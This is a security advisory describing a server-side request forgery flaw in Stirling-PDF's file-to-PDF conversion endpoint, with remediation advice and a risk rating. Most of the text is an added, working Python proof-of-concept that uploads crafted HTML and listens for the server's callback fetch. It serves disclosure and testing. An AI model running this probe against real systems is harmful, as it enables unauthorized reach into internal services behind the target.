Stirling-PDF Server-Side Request Forgery Vulnerability in File Conversion Endpoint

Vulnerability

A server-side request forgery (SSRF) vulnerability has been identified in Stirling-PDF versions prior to 1.1.0. The issue lies in the 'convert file to pdf' functionality, which hands uploaded files to LibreOffice's unoconvert tool for conversion. The application does not validate URLs embedded in the uploaded document, so external resources the file references (for example the src of an image tag in an HTML file) are fetched by the converter from the server's own network position.

Impact

An attacker who can submit a file for conversion can make the server issue requests to URLs of the attacker's choosing, using the server's network position and credentials of reach rather than the attacker's own. This could lead to unauthorized access to internal services or resources that are not directly exposed to the attacker.

Reproduction

To reproduce this vulnerability, send a POST request to the '/api/v1/convert/file/pdf' endpoint with a crafted HTML file that includes an image tag whose src points to a server you control. The request must be in multipart/form-data format, with the 'fileInput' field carrying the crafted file. The server passes the file to unoconvert, which fetches the referenced image during conversion; an inbound request arriving at your server confirms the SSRF. The callback host must be reachable from the Stirling-PDF server, not merely from the client sending the request.
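The reproduction steps above, as an added example that is not part of this advisory or of the Stirling-PDF project: a Python 3 script using only the standard library that builds the crafted HTML, hand-rolls the multipart/form-data body for the 'fileInput' field, POSTs it to '/api/v1/convert/file/pdf', and runs a small callback listener so the server-side fetch can be observed. The target address, callback host and file name are assumed lab values; the endpoint path and field name are the ones the advisory gives.

```python
import threading
import urllib.request
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer

ENDPOINT = "/api/v1/convert/file/pdf"   # endpoint named in the advisory
FIELD = "fileInput"                      # multipart field named in the advisory


def build_html_payload(callback_url: str) -> bytes:
    """Return an HTML document whose only external reference is an <img>.

    The image src is what the vulnerable converter fetches server-side;
    the rest is filler so the file still converts cleanly.
    """
    html = (
        "<!DOCTYPE html><html><head><title>ssrf-probe</title></head>"
        f'<body><p>probe</p><img src="{callback_url}" alt=""></body></html>'
    )
    return html.encode("utf-8")


def build_multipart(field, filename, content, content_type="text/html", boundary=None):
    """Build a single-part multipart/form-data body (no third-party deps).

    Returns (body_bytes, content_type_header_value).
    """
    boundary = boundary or uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode("utf-8")
    tail = f"\r\n--{boundary}--\r\n".encode("utf-8")
    return head + content + tail, f"multipart/form-data; boundary={boundary}"


class _CallbackHandler(BaseHTTPRequestHandler):
    """Records (client_ip, path) for every GET; a hit confirms the server-side fetch."""
    hits: list = []

    def do_GET(self):
        _CallbackHandler.hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")   # minimal body so the converter does not stall

    def log_message(self, *args):     # keep the console quiet
        pass


def start_callback_listener(host="0.0.0.0", port=0):
    """Start the listener in a daemon thread; returns (server, bound_port, hits)."""
    _CallbackHandler.hits.clear()
    server = HTTPServer((host, port), _CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1], _CallbackHandler.hits


def fetch_url(url, timeout=5):
    """Issue the same plain GET the converter would; use it to check the listener."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status, resp.read()


def send_conversion_request(base_url, body, content_type, timeout=120):
    """POST the crafted file to the conversion endpoint; returns (status, response_bytes)."""
    req = urllib.request.Request(base_url.rstrip("/") + ENDPOINT, data=body, method="POST")
    req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    # Assumed lab values: the target instance and an address it can reach back to.
    TARGET = "http://127.0.0.1:8080"
    CALLBACK_HOST = "10.0.0.5"
    server, port, hits = start_callback_listener()
    token = uuid.uuid4().hex          # unique path so the hit cannot be mistaken for noise
    html = build_html_payload(f"http://{CALLBACK_HOST}:{port}/ssrf-{token}.gif")
    body, ctype = build_multipart(FIELD, "probe.html", html)
    status, _ = send_conversion_request(TARGET, body, ctype)
    print("conversion HTTP status:", status)
    print("callback hits:", hits)     # a hit carrying the token proves the server fetched it
    server.shutdown()
```

The token in the image path ties an observed hit to this specific request, which matters when the listener is shared or the target is scanned more than once. If no hit arrives but the conversion succeeds, check first that the callback host and port are reachable from the server, since an egress filter blocks the probe just as it would block a real exploit attempt.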

Remediation

Update to Stirling-PDF version 1.1.0 or later, where this vulnerability has been patched.

Added: Aug 11, 2025, 10:18 PM
Updated: Aug 11, 2025, 10:18 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 0.0
exploitability: 6.0
remediation: 7.7
relevance: 0.3
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.